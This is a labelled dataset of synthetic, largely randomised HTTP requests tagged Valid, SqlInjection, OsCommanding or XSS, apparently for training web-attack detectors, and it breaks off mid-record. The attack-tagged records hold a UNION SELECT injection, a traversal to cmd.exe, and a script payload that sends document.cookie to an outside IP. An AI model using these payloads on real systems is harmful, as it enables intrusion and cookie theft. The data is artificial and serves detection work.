If-Unmodified-Since: Tue, 17 Nov 09 04:01:12 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 36
MIME-Version: 1.0
Pragma: e=n
Proxy-Authorization: Digest uri=http://nsa5.net/jIlhTi.rar
Authorization: Yxtuni stlefxty=rdmt0sm
Range: 59192-,5736-40
Referer: http://aioccee.ch/rsra4en/sehjfnte.php3
TE: trailers,trailers,gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.4 (Machintosh; U; PPC Mac OS X 4.5; ao-so; rv:1.6.2) Gecko/48424231
UA-CPU: StrongARM
UA-Disp: 143,8998,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 677x984
Via: 8.1 131.10.79.109, 5.0 www.pcEait.js
Transfer-Encoding: compress
Upgrade: wJoe/9.4, csik/4.7, njsNtm/6.0
Warning: 930 110.20.27.75 "eiinSpnnnf" "Sat, 25 Dec 04 04:52:15 UTC"
X-Forwarded-For: 39.123.84.227
X-Serial-Number: 349745
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

esrmb5hzrfoen=Y&e1ac1tenhlqe=2P_9Qh9L&aTucttETl8we=aEe&edgwsIa4lt=/9orda6&ihek=f863&db=25327&ssn=oel&lsHNFy@P-_=Nteutmptcc9t

End - Id: 6872
Start - Id: 35219
class: SqlInjection
GET /qdDmayNNaw.html?wgtiye=339&snpinteop=%27++%29++++UNION++ALL++SELECT+++++%27s7%27%2C6652%2C0311%2C%27sTb1fhtun%27%2C1+++FROM++0r++++WHERE++++%28+%27%27++++%3D+++%27 HTTP/1.0
Host: 47.199.200.126
Connection: close
Accept: text/xml, image/*;q=0.0, audio/*
Accept-Charset: iso-8859-3, macintosh, x-mac-turkish, isiri-3342;q=0.4, windows-1252
Accept-Encoding: *;q=0.3
Accept-Language: ca-Ea;q=0.7, hn7TonYe-tdeeoa;q=0.2, e-ytEt;q=0.5, tHaajhI-eNn, Ae-whaibdh
Cache-Control: only-if-cached
Client-ip: 245.178.189.228
Cookie: ne9oe=oFif0j
Cookie2: $Version="53"
Date: Wed, 07 Dec 05 13:31:15 UTC
ETag: "osdX6lLH@4A8bU-Sr0"
Expect: dsSr=Keec;ibhiddns=fentrb
From: oeeetot@ecjsbsx.org
If-Modified-Since: Wed, 17 Jun 09 19:20:54 CET
If-Unmodified-Since: Mon, 07 Jul 08 12:22:23 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: eTi1ny Jxi3piru=smaxcs
Authorization: Basic MWdNbmVuaWI6aHRpb2U=
Range: -2,109-7
Referer: /4ojtuy/qiadb/sdehrszt/57yj.gz
TE: deflate
Trailer: Accept-Language
User-Agent: dtmsit (tx@.o9y; 9gfJ0t)
UA-CPU: Sparc
UA-Disp: 3369,6494,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0990x1742
Via: 2.5 160.198.150.9, s6sIhc/0.6 214.98.136.146
Transfer-Encoding: gzip
Upgrade: satc/9.3, dlwu/4.3, ras/0.6, hmrcOE/0.0
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 123.169.83.240
X-Serial-Number: 653794992925901
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35219
Start - Id: 24639
class: Valid
GET /i3i5Ce5cnvbX8U/m7fundccer7/yk@/sowepmtp3shxkbrterl/sIs3/u8mjTQ/mdaqcexte/QSJT4f/L@Z/yZ.exe?eisndla=aoCJ HTTP/1.0
Host: 117.234.191.229:3
Connection: close
Accept: audio/x-wav;q=0.4, audio/*
Accept-Charset: windows-1253, shift_jis, euc-tw
Accept-Encoding: gzip
Accept-Language: uziilIuO-ah61ztw;q=0.4, grh3ao-evi, h6ihh-ot;q=0.8, sipw-ddS
Cache-Control: he='noeRtc'
Client-ip: 78.42.192.138
Cookie: ttcrhri17eo9=Wtnw;thseudv=65357;dtef3fbywJaxnh=14431;rP.l4enGP=itaaca9burpWoqeUck;beeSrtrmbrg=yTla8Inlbauot
Cookie2: $Version="479"
Date: Tue, 21 Aug 07 15:41:11 UTC
ETag: W/"R42UaEF-6rwLFouHVz"
Expect: aiAe=erbsr
From: fmet44t@idw1orkL6v.uk
If-Modified-Since: Fri, 30 Jun 06 05:24:35 CET
If-Unmodified-Since: Fri, 08 Oct 04 19:09:42 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2320
MIME-Version: 3.5
Pragma: oo=oclis6
Proxy-Authorization: NTLM aWhhdG5oR3dsaXRuMWE4dVR2enN4Qnc2Y25xaXJlYWNheGU=
Authorization: Basic bjNkYW9uZDppZHNzcG5nZA==
Range: 631670-990,0718-
Referer: http://ectc.it/rbRceoe.zip
TE: trailers
Trailer: If-Modified-Since
User-Agent: TnougME/2.5
UA-CPU: StrongARM
UA-Disp: 7015,359,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 803x2211
Via: FTP/0.4 www.wyotldc.png, HTTP/0.1 98.152.123.78, 4.2 66.205.97.87
Transfer-Encoding: compress
Upgrade: sa2tyk/6.0, ly6g/2.9, sriz/6.1, xel/4.8
Warning: 846 www.iihrevae.gif "eaehIhsswntnhuios8" 
X-Forwarded-For: 97.48.167.87
X-Serial-Number: 562281573568029685
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24639
Start - Id: 7162
class: Valid
POST /tmR7ttJcBX2ufnMLjt.shtml? HTTP/1.1
Content-Length: 95
Content-Language: 8E,BteUeiyy,6mtoyout
Content-Encoding: deflate
Content-Location: /boeah.tar
Content-MD5: emx0YTdodXJIbWl0NUVjdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 15 Jul 09 15:44:24 CET
Last-Modified: Wed, 06 Aug 08 03:43:23 CET
Host: 220.170.130.48
Connection: aumDS9rj
Accept: image/jpeg
Accept-Charset: euc-tw, iso-8859-8, hz-gb-2312;q=0.5, iso-8859-6, euc-cn
Accept-Encoding: gzip;q=0.4, deflate, gzip
Accept-Language: *;q=0.5
Cache-Control: max-age=13443
Client-ip: 173.225.60.58
Cookie: cmco=t7e;Hsvtamspta=nqNu6-h.gA5x;eeRcn6on=sIgm4
Cookie2: $Version="09"
Date: Tue, 07 Sep 04 08:20:03 UTC
ETag: W/"RivLDL4hE_xM22g38l"
Expect: 100-continue
From: a0Qar@yilcQa.net
If-Modified-Since: Wed, 19 Mar 08 05:33:14 CET
If-Unmodified-Since: Tue, 03 May 05 01:33:19 UTC
If-Match: "o6hIfZZK7kswE@_"
If-None-Match: "Pr6BC45G7f4UBjdbE"
If-Range: Thu, 29 Oct 09 06:12:43 CET
Max-Forwards: 3764
MIME-Version: 2.9
Pragma: Ldmeisco='IbSa'
Proxy-Authorization: NTLM ZUloaHNPaXI3dGw3dGVsTmloM1VUeWFkcnRyVHRobDdkaEh0aG14ZDhlcw==
Authorization: NTLM ZnNyYWFXcGVzaERCVG10YnRlYmVlb2FlYWllZ2V0aWVpZWVsY2l0eg==
Range: 21-
Referer: http://danawnrX.gov/rAbheseo/iiro/els6rd.pdf
TE: trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/1.0 (Machintosh; U; Mac OS X 1.2; di-nn; rv:3.5.5) Gecko/91897108
UA-CPU: MIPS
UA-Disp: 1964,0580,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 976x2484
Via: 3.8 www.iDP13ea.tiff, 0.8 243.14.182.28
Transfer-Encoding: j7lhl
Upgrade: ecs3ms/8.7, i206fu/9.3, stsan/9.3
Warning: 018 www.2Ital.html "buTaFd" "Sun, 28 Nov 04 11:32:28 UTC"
X-Forwarded-For: 14.39.4.242
X-Serial-Number: 73109423646427331
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nrtss3orSqsbu=3&mi3=60&vnbou=19050&ratslojntfi=tZrXqdM@Cu&xPdraoO=0oekgeaW6sbl&vlFQYN_=Ardche

End - Id: 7162
Start - Id: 10115
class: Valid
GET /hypNehmsncy/r3qITzIYAuS2IE/oTHMyDaLN1wZBuTOk3/enXDv2_IRvtOvSu.jpeg? HTTP/1.0
Host: 91.101.92.123
Connection: ebfsrjn
Accept: text/*;q=0.3, video/mpeg;q=0.4
Accept-Charset: iso-2022-jp, iso-2022-jp;q=0.1, x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: iI-c;q=0.0, pvpbgoJ-n8Ca;q=0.6, us9dst-feo;q=0.7
Cache-Control: max-age=6
Client-ip: 51.159.109.205
Cookie: sre=1aQwoieviplhpc;FieoC0eYlvteta=-uupdatebfy l;Liframe-CXs=bexeci
Cookie2: $Version="6"
Date: Mon, 21 Feb 05 17:21:12 CET
ETag: W/"sktmPGKhc.CzN.dJazWN"
Expect: tjCfb
From: tsbr5seo@najlknme.it
If-Modified-Since: Sun, 14 Aug 05 19:18:59 CET
If-Unmodified-Since: Fri, 04 Jun 04 08:24:19 CET
If-Match: "AfzP2tenHweqi_y."
If-None-Match: "jpsJvAStILDq38dX7XS"
If-Range: Sat, 05 Jul 08 22:12:05 GMT
Max-Forwards: 45
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Basic ZHRzZTp0c29jY3lT
Authorization: Basic Y2VoVG5hWW46dHR1b25lb1Q=
Range: 308-,50-,44-
Referer: /cdeelld/binoIhet/kTgTa/enheoIt.png
TE: trailers,trailers
Trailer: Connection
User-Agent: Mozilla/4.4 (Machintosh; U; PPC Mac OS X 4.6; un-tg; rv:2.7.1) Gecko/72958379
UA-CPU: x86
UA-Disp: 5781,4681,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 117x256
Via: HTTP/0.9 247.117.57.195, 6.7 www.estr.shtml
Transfer-Encoding: gzip
Upgrade: 9auhs/2.2, Vr6/5.2, idMee/1.6, dTb/1.4, Owrn3l/3.6
Warning: 385 30.24.237.210 "kiToToctkeJrblniam" 
X-Forwarded-For: 233.251.46.48
X-Serial-Number: 952791453118
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10115
Start - Id: 43937
class: OsCommanding
GET ..%%35%63../..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.Hxiaea.fr
Connection: emgohod
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-stale=59925
Client-ip: 203.44.173.36
Cookie: 0lTbeepccarme=68476;ubiangqa9=7982;dcoeoenicltmhox=pk=eaccess_loger5D;dxellJn0ae2seiN=5;iH=betweenTMzuenuaararrs
Cookie2: $Version="4"
Date: Sun, 16 Sep 07 11:43:11 CET
ETag: "FKkc6IzcbEuCntMpiq"
Expect: 53qdsl=8yhants;n1ncn=wiiOf
From: 1mrsvi@GkweMt.fr
If-Modified-Since: Mon, 16 Nov 09 09:40:27 UTC
If-Unmodified-Since: Mon, 22 Oct 07 12:00:02 CET
If-Match: "D2.z7TCFzeJ0kUrcB7SJ"
If-None-Match: *
If-Range: Wed, 28 Apr 10 16:15:48 GMT
Max-Forwards: 85
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: enro elaaRn=qkanorol
Authorization: NTLM QWhESWxkZ3lubHNJd3l3eWhkeVJvYWFlb3JtbnBhU2FhZjJlZXp1bm5jZQ==
Range: 080946-24031
Referer: http://i0rt0ai.net/wlet/etmetrh/rlO8owts/yhhtesf.php
TE: deflate;q=0.4,trailers,deflate
Trailer: If-None-Match
User-Agent: hehotdedeeebeciasfAi
UA-CPU: StrongARM
UA-Disp: 9151,3536,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 428x0275
Via: HTTP/5.2 109.69.241.16, iot/1.9 62.83.26.224
Transfer-Encoding: compress
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 306 www.z5ho.jpg:47 "ihusrziuEUas" "Tue, 03 Apr 07 20:01:51 CET"
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 221610848523557
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43937
Start - Id: 31789
class: Valid
GET /trqmcuue/raoo/db4dehn6iepNaeoTm.shtml?JYRsock_stream2where4Xo=qTtlgxt&iojli9lamlre=hgr6&5y0Khome=hOEn7B&JG0a0E=dZ477B3d&whereYu_R@havinglog2d=7113677&ausiefymilooa8=7436&uenOagldnaNEw=afkJ.nuDw&oehttpsGUf-etc8=%3A%28d%29&gg=e9btel1&nrortd5ocs=tP&rdoEpi=2376&le0biqcT3=9&xhtpassxTmochaq=openl HTTP/1.1
Host: www.fDfo.st:80
Connection: close
Accept: image/gif, application/postscript, text/plain
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 207.214.146.123
Cookie: atjirCrt=Oeteosearr;nm8UWxZaL=Aiiiqhxe;9XbesivsacLrh5=67820
Cookie2: $Version="86"
Date: Sun, 03 Feb 08 18:16:49 UTC
ETag: "F-7TDaSOtwmZmvT"
Expect: 100-continue
From: o58tOaQr@asxayh.com
If-Modified-Since: Thu, 08 Nov 07 21:20:35 GMT
If-Unmodified-Since: Thu, 11 Jun 09 20:58:45 GMT
If-Match: "gAu-nn4MKAcPT1lE"
If-None-Match: "HaCeMTCd04e6FpN"
If-Range: Fri, 25 Jan 08 05:30:07 CET
Max-Forwards: 5
MIME-Version: 5.5
Pragma: xa='dwnh'
Proxy-Authorization: Basic aHI4SGI6bmVpdHRy
Authorization: Basic bGFzcnBySDp0c2h5VHVv
Range: -135019,336204-,10910-
Referer: http://www.hli5n.ch/eocqg/1dfhu.mp3
TE: deflate;q=0.0,chunked;q=0.6
Trailer: User-Agent
User-Agent: wyr0hqga
UA-CPU: PowerPC
UA-Disp: 423,7753,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7261x084
Via: 8.7 www.i8NNt.htm
Transfer-Encoding: gzip
Upgrade: reCgm/1.9
Warning: 075 www.tgj5brs.htm "nOEloag30nqnokrne7lo" 
X-Forwarded-For: 99.24.216.147
X-Serial-Number: 995299594
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31789
Start - Id: 4686
class: Valid
POST /i69vvD-t65T6VXru1/17lnfahtierfssamhya/evZRJh1.s/s9t7VFCQxk1A/1shYuiserviceslSeFet/WV71b2Y/umydoiL8elsapgokoh3i.dll? HTTP/1.0
Content-Length: 241
Content-Language: zry30iaO,c
Content-Encoding: compress
Content-Location: /4elan/Iithit/c1ormEmr/nmunf8.php
Content-MD5: dGRlaWhhdWRpb3J1YXVjaA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 04 Sep 05 14:14:57 GMT
Last-Modified: Thu, 05 Feb 04 04:06:01 GMT
Host: www.pkaiu.uk
Connection: close
Accept: image/gif;q=0.8
Accept-Charset: euc-cn, windows-1253, x-mac-icelandic, us-ascii;q=0.6, isiri-3342
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 134.20.236.30
Cookie: fiesraf=2]t;rDlcdayuhnqUya=c74tqAlTTrB;0ety5=+w1;4pe5=18623538
Cookie2: $Version="706"
Date: Wed, 22 Jun 05 05:47:25 GMT
ETag: W/"mZLsepU1bDFpWcp"
Expect: vcIl=8ncdDto;ieieu7t
From: Jtmtr@dnaio6h.gov
If-Modified-Since: Fri, 18 Sep 09 16:54:30 GMT
If-Unmodified-Since: Thu, 26 Apr 07 14:27:01 UTC
If-Match: *
If-None-Match: *
If-Range: "uupiVj3R-47AGTkQo"
Max-Forwards: 353
MIME-Version: 6.6
Pragma: qrth='oiyfChtr'
Proxy-Authorization: 1sso Eodpor=eor82e
Authorization: Basic ZmxUcGlrOmVyaG55bg==
Range: 511-,489649-576168,-523
Referer: http://eagTeiA.biz/q7erehod/ftteek/m5Ievti/onhN/wnEelnn.wmn
TE: chunked,gzip,trailers
Trailer: Expect
User-Agent: tQZGps4l8o http://www.bioepsf.de
UA-CPU: 68000
UA-Disp: 199,143,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 561x7800
Via: HTTP/1.9 216.242.11.236, HTTP/8.1 www.zcatieh.js:10, FTP/3.9 www.acoHto.shtml
Transfer-Encoding: gzip
Upgrade: cdZ/6.2, tOo2/2.7, neA/5.6, es0/1.8
Warning: 536 10.92.102.202 "5tc0ut6" "Wed, 19 Aug 09 01:08:40 GMT"
X-Forwarded-For: 112.130.112.55
X-Serial-Number: 263274968971
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lhhrre=uhiootpmneoLrls&J5.KUDuQ=naddiet &LqaSstyle6Kdr=jGC&te=titaen&eceeeuoeqetijs=(2f&FWmscriptbU29xtermlocation=@scriptTeaa3e(e;Ha/elpasswdnullx/&tpTtRlTS=didas]yslikehbewherewo&tijetzzseoTla=od7Ir0eg&UgwBK5=l31usrl&tdtu=ezh

End - Id: 4686
Start - Id: 25033
class: Valid
GET /o_Mjvs_tQH/fAOKICxSBd.mdb?o4ysmriks=r6ei%3Atmdc%27na&veahOlk6kv=opte&esews9=aeoanpdle6ihw&tbxyBrareoR=68&ii=soAUkcceaTArnJmgi&ttemo=aat3f8eg&d6tm1eo6Ii=pa&havingGqFwdelete.kscript=noelikeaemplboot.ini&zqrzS=aouy2syh3ot2eud&ihisfy=e1pP&udl6ootNdoecntY=hei&A15N.stylezR8w=99078137&gGpd7perl=189523736&cehltbevl3=iYsbrns2nkTnob2&5h8iiotsu=lctii%3Fac HTTP/1.1
Host: www.Fsesai.be
Connection: keep-alive
Accept: text/*
Accept-Charset: x-mac-icelandic, iso-8859-6, windows-1252, utf-7
Accept-Encoding: *;q=0.3
Accept-Language: z-ojuet7ae;q=0.8, 2n3o-eOgobe;q=0.7
Cache-Control: jut6an=tr
Client-ip: 15.48.155.195
Cookie: lCsraoo12asc=2
Cookie2: $Version="57"
Date: Thu, 06 Oct 05 17:02:16 UTC
ETag: W/"nfsHJ.M1pxNiBH8r"
Expect: esoi
From: ldep5e@hgrLTT7s.gov
If-Modified-Since: Fri, 23 Mar 07 14:13:27 UTC
If-Unmodified-Since: Thu, 30 Dec 04 18:35:08 GMT
If-Match: "AgZhyzXuiGnhCKPx"
If-None-Match: *
If-Range: "O2NGPMiPpPIDp-lYn"
Max-Forwards: 2
MIME-Version: 8.5
Pragma: td1='oe1k'
Proxy-Authorization: Basic bmFhbXIxZTpwdGVpcm5u
Authorization: NTLM c3RlcGVmZ25jdHBIcmVyZ1Zjc2FyTW5tNWNzbkh0aHN0ZXdhZGkzcXd1cmV0bzRo
Range: 81636-,-8
Referer: /isne/rrdoms/5prn/fEsryt.js
TE: trailers,trailers,trailers
Trailer: Referer
User-Agent: Mozilla/8.7 (Windows; U; WinNT 2.2; es-ti; rv:1.4.3) Gecko/29325208
UA-CPU: x86
UA-Disp: 002,8745,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 669x906
Via: 7.7 www.otCug7je.js:24142, 0at/3.2 44.149.89.210
Transfer-Encoding: identity
Upgrade: TpPo/7.9, mmA/5.5, srAneh/5.3, eag/1.0
Warning: 976 50.238.126.25 "5Nrzea1Ynnb" "Thu, 31 Dec 09 03:17:04 GMT"
X-Forwarded-For: 190.232.63.32
X-Serial-Number: 21941
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25033
Start - Id: 48181
class: XSS
POST /iUzM2wGN/fvfsuPptf@rGRN59/fCle/vVHuq8y/eeWn60au/um8/truens/ac4Gjioppvr7q/i8eqyrrtetme/CfetOxl3/rueeylhoc9rapge/o0esysnteon4tia2s5.msf? HTTP/1.1
Content-Length: 173
Content-Language: iRtame
Content-Encoding: gzip
Content-Location: /3svn.mp3
Content-MD5: dGxFOWVkY3RiYWJtZWRuaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 11 Aug 06 09:51:55 CET
Last-Modified: Fri, 11 Mar 05 24:11:03 GMT
Host: 221.158.253.240
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: compress;q=0.5, compress, deflate;q=0.0, gzip;q=0.4
Accept-Language: <img     src=&{[window.open('http://15.189.224.92/ernior.exe'+document.cookie);]};    >
Cache-Control: only-if-cached
Client-ip: 148.144.232.153
Cookie: resoA3orolwlnzO=539386
Cookie2: $Version="19"
Date: Wed, 08 Nov 06 13:44:45 GMT
ETag: "13Q28YBJBklXk8y"
Expect: 100-continue
From: umnoGes@ienl6i3a.biz
If-Modified-Since: Thu, 13 May 04 09:18:57 GMT
If-Unmodified-Since: Mon, 26 Apr 04 21:52:26 GMT
If-Match: *
If-None-Match: "jErLW0p7avK5EVal"
If-Range: *
Max-Forwards: 0
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: snef otwda=wezessn
Authorization: Digest nc=3097dA87
Range: 57637-,977-
Referer: /vak7.msf
TE: trailers
Trailer: Transfer-Encoding
User-Agent: bnpciooprydti9iml
UA-CPU: Sparc
UA-Disp: 194,7872,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 615x877
Via: nnejr/7.8 www.ao29s5e.png, he7/6.3 www.icma.css, HTTP/0.6 233.25.126.221
Transfer-Encoding: deflate
Upgrade: srri/9.4, f3wl9/8.3, Feenos/9.2
Warning: 505 20.155.179.30 "pllnsh" "Sat, 12 Dec 09 10:14:04 GMT"
X-Forwarded-For: 142.177.244.22
X-Serial-Number: 43100124354483
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cneaadhn=hl$%5insertggtiatai9h[&92wcmfiac0=rll8d4.M&1scriptVPy=hnoahadntaki&fcrarewyxsoipy=xcnTspl&zttmpFexecxjy4d=hKU&rjMealV=dernhGuq&titews=sB@5r0?inputuia8null

End - Id: 48181
Start - Id: 22380
class: Valid
GET /dx17u@V.swf? HTTP/1.1
Host: 118.43.202.212:80
Connection: fntod3
Accept: */*;q=0.0
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: ic-qeteoh0d, avhqnj-hs;q=0.9
Cache-Control: no-store
Client-ip: 231.247.76.251
Cookie: TIoaFeBH@=1 mtn;1window.opendropcOinY5xterm=likeS shidHeAo ;2Rhknshavingv@=eU9JKuYj;ldocumentcBDK.OKUunion=passthruv|;eHa_PsNDh=442
Cookie2: $Version="6"
Date: Mon, 02 Jul 07 14:55:21 CET
ETag: W/"rZV2_AcwMYX1wAjFkfQ-"
Expect: 100-continue
From: Thg1b@weOoea0a.org
If-Modified-Since: Mon, 10 Nov 08 16:44:10 UTC
If-Unmodified-Since: Tue, 26 Jul 05 20:21:49 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 01 Sep 06 19:57:09 GMT
Max-Forwards: 752
MIME-Version: 4.3
Pragma: 6ea='tye'
Proxy-Authorization: Digest uri=http://oaaa.com/neutur/gmqe/y1hen1/oiewude2/t2mmveSO.pdf
Authorization: Digest uri=http://www.cxgant9.it/7dctveTm/iesihisa/iqeeImi.ace
Range: -912509
Referer: http://www.haa1d.com/kebMea/rcrn/urjdDc1h/enyac/tchsaa.conf
TE: trailers,gzip;q=0.1,trailers
Trailer: Date
User-Agent: cLYT2B http://www.we48hdE.gov
UA-CPU: StrongARM
UA-Disp: 1777,9655,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 112x1566
Via: 1.6 220.250.180.184
Transfer-Encoding: deflate
Upgrade: anin8s/5.0, 42tdtt/2.9, tMob/9.6, 6sg/5.1
Warning: 201 200.172.85.148 "uwxb7lfeBdn3mteneoad" "Thu, 28 Sep 06 02:25:40 GMT"
X-Forwarded-For: 7.132.119.46
X-Serial-Number: 570685869927204
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 22380
Start - Id: 31020
class: Valid
GET /ftMg4tAo.mdb? HTTP/1.1
Host: www.sgdxernp.biz
Connection: close
Accept: */*;q=0.8
Accept-Charset: windows-1254;q=0.8, windows-874, ks_c_5601-1987;q=0.9
Accept-Encoding: *
Accept-Language: ts-Tnbel;q=0.9, rahdesn-fdnsztn;q=0.8, di-jk5Dnhln
Cache-Control: max-stale=1823
Client-ip: 154.71.85.33
Cookie: aasudeio=sC_65hDyll;soo66du=vbNY-nN;9%uPQ3f=dD.Jk;ss8prysgxe=ggsiThnodeb;atplhshadr=i%3Fdwrnqoiemdrp;w41window.openGstdinvlib=Rie
Cookie2: $Version="98"
Date: Tue, 19 May 09 16:13:41 CET
ETag: W/"3UcaAjaeWeHVa3QgvT@"
Expect: s3NdRsp
From: iqyoom@ptIe99oiss.be
If-Modified-Since: Mon, 27 Feb 06 19:03:51 GMT
If-Unmodified-Since: Thu, 08 Jul 04 09:06:34 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 82
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="VltR"
Authorization: NTLM bnBzb2Vlb28yamRhU0FpbHVzdGVvYzllVUVpYjl0aHM0bGVvZXRuZThzaWx1ZQ==
Range: 74-93290,6-30238
Referer: /dmeIzDla/aNeoai/aExp.avi
TE: gzip,chunked,chunked
Trailer: Expect
User-Agent: Mozilla/6.3 (X11; U; Solaris 5.3; pr-ne; rv:9.2.7) Gecko/73957074
UA-CPU: MIPS
UA-Disp: 584,4814,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8381x468
Via: FTP/8.0 65.152.239.50
Transfer-Encoding: identity
Upgrade: lkT/4.2, nRs4h/2.7
Warning: 688 www.hNswTi.js:13 "lEt2isanneterMHSniie" 
X-Forwarded-For: 175.214.29.11
X-Serial-Number: 827318624572609
----: ----------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 31020
Start - Id: 2969
class: Valid
GET /2h_k.W0s0V1amWVR9b/i@O@9sYDiZvaCi0hR/hxxs/e0k1Ox/gb-FJGSQftzSF/o_/hkePp_vrk85ZqCLc/tb3dJ/7jg2WCinPj.jpeg?nsoceso8drirIo=82340&ecp=yEnsmtn1Ched&2hUoC=970&oPscEhrnos6=hNoiorM&ebauyDEsinnhrvp=%3Brem3AE%3CEt+eltdmw&iieNnt=dsbetweensblrubr+es&EekOcptnLtT8s=e%7Coi&o83g8nc9rSo=riBXSv&6gY2BS7=Mselectahe&nNi03em=iKDGnx6RN&iiglispt=a%3Dat0&6lhOhttps=osxdLebffnorthzgtq HTTP/1.1
Host: www.enHitxavsa.net
Connection: 8Ttz
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: compress, compress;q=0.1, compress, deflate, compress
Accept-Language: *
Cache-Control: no-cache
Client-ip: 24.115.162.196
Cookie: nawhct4dn0bme=sjD41;uAtyeTndu=05762;f4e2=66139;a@.7C@T64M7=5164722
Cookie2: $Version="1"
Date: Wed, 25 May 05 07:22:41 GMT
ETag: W/"gkaRWdgtR1N8TwMOaI@"
Expect: 100-continue
From: Eth9@iyo0iiiw3a.it
If-Modified-Since: Fri, 24 Apr 09 15:58:04 UTC
If-Unmodified-Since: Fri, 02 May 08 22:10:24 GMT
If-Match: "A_DWtfWsW9fD7TZcM"
If-None-Match: *
If-Range: *
Max-Forwards: 469
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Basic bGUxcjpiQTlh
Authorization: ijf5 adere02=sleimE8e
Range: 941701-436,57-,44-
Referer: /tlttterm/eenris/iesrer.tiff
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/7.5 (compatible; Konqueror/3.3; Solaris; hthsoeauge; cpt8kmap)
UA-CPU: StrongARM
UA-Disp: 088,2412,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8247x2505
Via: oiija/4.7 www.qieaws.js, 3.2 206.175.104.12, 0.6 www.Vrip.jpeg
Transfer-Encoding: deflate
Upgrade: er1/3.7, ohbtar/9.6, igrns/9.6, QebnrE/9.1, rWoN/5.7
Warning: 133 129.24.35.131 "eutrftdlptmud" 
X-Forwarded-For: 200.70.38.178
X-Serial-Number: 1920071
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2969
Start - Id: 10308
class: Valid
GET /c4/SLRoptbrsPB.jpeg?oodysl1=mim HTTP/1.1
Host: 68.105.90.178
Connection: close
Accept: text/html;q=0.1, audio/*, audio/*;q=0.8
Accept-Charset: windows-1255;q=0.5, windows-1251;q=0.6
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-cache
Client-ip: 42.80.49.249
Cookie: Ballb91=R tI8lbnoca;Oaypbn9hA7=aefe;satsnyS5i=ro;eeee=6;ecsqfmlec=naahukAezq1ral;S4e7xngnhstih=903
Cookie2: $Version="15"
Date: Mon, 25 Jan 10 08:16:50 GMT
ETag: W/"xd5FGOL_aHmTAy0"
Expect: 100-continue
From: trNaAn@atrmbi.com
If-Modified-Since: Fri, 09 Mar 07 02:07:31 UTC
If-Unmodified-Since: Sun, 30 Mar 08 05:08:08 GMT
If-Match: "Y5kyXh43Ss3dtRUOVQP7"
If-None-Match: *
If-Range: *
Max-Forwards: 559
MIME-Version: 1.3
Pragma: e='e'
Proxy-Authorization: NTLM bnRUZzNjV29lcmRvdWlycmhFaW10b0VGZWlSbW5lT3JvbGlyb2VtaDNhYWNtbmc=
Authorization: Digest username="ol2CinNr"
Range: 12-5596
